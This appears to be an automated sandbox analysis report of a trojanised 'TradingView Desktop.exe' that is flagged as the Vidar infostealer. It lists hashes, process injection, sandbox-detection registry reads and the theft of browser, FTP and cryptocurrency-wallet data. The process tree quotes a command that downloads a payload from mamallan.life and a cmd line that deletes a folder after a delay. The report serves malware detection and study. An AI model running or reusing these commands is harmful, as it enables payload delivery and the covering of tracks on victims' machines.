Analysis
- max time kernel: 449s
- max time network: 489s
- platform: windows11-21h2_x64
- resource: win11-20240611-en
- resource tags: arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 30-06-2024 18:06
- Static task: static1
- Behavioral task: behavioral1
- Sample: DAC/bin/SqlPackage.exe
- Resource: win11-20240611-en
General
- Target: TradingView Desktop.exe
- Size: 779.2MB
- MD5: e8fa1288bb7eeee03e51848faf7a5677
- SHA1: 17b3b9b521eae0935aa427ace0c273f3df733030
- SHA256: 5cc8741c9ab6011c21e2f485ee33e88d19954aa579dc0be2c64592c5392cbb05
- SHA512: 75aea3e803dfb34a8856204419742599b9411342ca7adf206126f4cc06c8e434764bdacaa33f353597e194799870adbbb4924dc17deee6f3c9cdce12bc67e140
- SSDEEP: 196608:nxO95CWNPkUhRJZPeKXXRWJbZd5d1dvbEGe5m+LjO:xSCWpJZPrnRWJFd5ndTEhjO
Malware Config
Signatures
- Detect Vidar Stealer (1 IoC)
  Processes:
    resource:  behavioral2/memory/4140-2-0x0000000000770000-0x00000000019CA000-memory.dmp
    yara_rule: family_vidar_v7
- Downloads MZ/PE file
- Executes dropped EXE (11 IoCs)
  Processes: HIDGCF.exe (11 instances)
    pid   process
    1832  HIDGCF.exe
    2648  HIDGCF.exe
    2320  HIDGCF.exe
    2856  HIDGCF.exe
    2516  HIDGCF.exe
    760   HIDGCF.exe
    3064  HIDGCF.exe
    4560  HIDGCF.exe
    2572  HIDGCF.exe
    5028  HIDGCF.exe
    3840  HIDGCF.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: TradingView Desktop.exe
    description        ioc                                                                                  process
    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      TradingView Desktop.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  TradingView Desktop.exe
- Delays execution with timeout.exe (1 IoC)
  Processes: timeout.exe
    pid   process
    3424  timeout.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes: TradingView Desktop.exe
    pid   process
    4140  TradingView Desktop.exe
    4140  TradingView Desktop.exe
    4140  TradingView Desktop.exe
    4140  TradingView Desktop.exe
    4140  TradingView Desktop.exe
    4140  TradingView Desktop.exe
- Suspicious use of WriteProcessMemory (28 IoCs)
  Processes: TradingView Desktop.exe, HIDGCF.exe, cmd.exe
    description                       pid   process                  target process
    PID 4140 wrote to memory of 1832  4140  TradingView Desktop.exe  HIDGCF.exe
    PID 4140 wrote to memory of 1832  4140  TradingView Desktop.exe  HIDGCF.exe
    PID 1832 wrote to memory of 2320  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 2320  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 2648  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 2648  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 2516  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 2516  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 2856  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 2856  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 760   1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 760   1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 3064  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 3064  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 4560  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 4560  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 5028  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 5028  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 2572  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 2572  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 3840  1832  HIDGCF.exe               HIDGCF.exe
    PID 1832 wrote to memory of 3840  1832  HIDGCF.exe               HIDGCF.exe
    PID 4140 wrote to memory of 3784  4140  TradingView Desktop.exe  cmd.exe
    PID 4140 wrote to memory of 3784  4140  TradingView Desktop.exe  cmd.exe
    PID 4140 wrote to memory of 3784  4140  TradingView Desktop.exe  cmd.exe
    PID 3784 wrote to memory of 3424  3784  cmd.exe                  timeout.exe
    PID 3784 wrote to memory of 3424  3784  cmd.exe                  timeout.exe
    PID 3784 wrote to memory of 3424  3784  cmd.exe                  timeout.exe
Processes (process tree; nesting level shown by indentation)
1. C:\Users\Admin\AppData\Local\Temp\TradingView Desktop.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\TradingView Desktop.exe"
   - Checks processor information in registry
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of WriteProcessMemory
   2. C:\ProgramData\HIDGCF.exe
      Command line: C:\ProgramData\\HIDGCF.exe http://mamallan.life/new_clip.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      3. C:\ProgramData\HIDGCF.exe
         Command line: C:\ProgramData\HIDGCF.exe
         - Executes dropped EXE
      3. C:\ProgramData\HIDGCF.exe
         Command line: C:\ProgramData\HIDGCF.exe
         - Executes dropped EXE
      3. C:\ProgramData\HIDGCF.exe
         Command line: C:\ProgramData\HIDGCF.exe
         - Executes dropped EXE
      3. C:\ProgramData\HIDGCF.exe
         Command line: C:\ProgramData\HIDGCF.exe
         - Executes dropped EXE
      3. C:\ProgramData\HIDGCF.exe
         Command line: C:\ProgramData\HIDGCF.exe
         - Executes dropped EXE
      3. C:\ProgramData\HIDGCF.exe
         Command line: C:\ProgramData\HIDGCF.exe
         - Executes dropped EXE
      3. C:\ProgramData\HIDGCF.exe
         Command line: C:\ProgramData\HIDGCF.exe
         - Executes dropped EXE
      3. C:\ProgramData\HIDGCF.exe
         Command line: C:\ProgramData\HIDGCF.exe
         - Executes dropped EXE
      3. C:\ProgramData\HIDGCF.exe
         Command line: C:\ProgramData\HIDGCF.exe
         - Executes dropped EXE
      3. C:\ProgramData\HIDGCF.exe
         Command line: C:\ProgramData\HIDGCF.exe
         - Executes dropped EXE
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJDBKKJKJEBF" & exit
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\timeout.exe
         Command line: timeout /t 10
         - Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
- C:\ProgramData\HIDGCF.exe
  Filesize: 6KB
  MD5: 2890a00ef6943ed98e2b7c6e3e49ae1c
  SHA1: 9072a751e68fe39222aebc87ffb898a423310ce9
  SHA256: 0ab41930f0a18d7629031bf5cd9a8c7090c13983c1d7567b9018185f0fa18f0d
  SHA512: dd01c349264e431f3ec900e05062fa4300a4f8a9219edf4f7f8014a92dadd4aae0f05cc4a103f30bdd4d9915460edb03769ffdff0c9e290acd4c89b3a16542fe
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\PIYE1NLF\new_clip[1].exe
  Filesize: 5.3MB
  MD5: 7cfdc2aee2ad1a7ef6f7715178aa8f93
  SHA1: fe57e4be70cf241a2c0cc2724088ae4c8830a816
  SHA256: 3c352a7f11ef8cca36e6d1c8a940c6c9e5e60a7d3a07c3a464a7f1e3ce035b46
  SHA512: 8be581dab7c20dbd95cc3987554ed5317e8dc9f22f26cfe353f1d4bc0590e767f321cda6987c2dcbdf1a7aba83cb3a2163c7cad8fcee7414c150bdf686d71469
- memory/4140-2-0x0000000000770000-0x00000000019CA000-memory.dmp
  Filesize: 18.4MB
- memory/4140-16-0x0000000061E00000-0x0000000061EF3000-memory.dmp
  Filesize: 972KB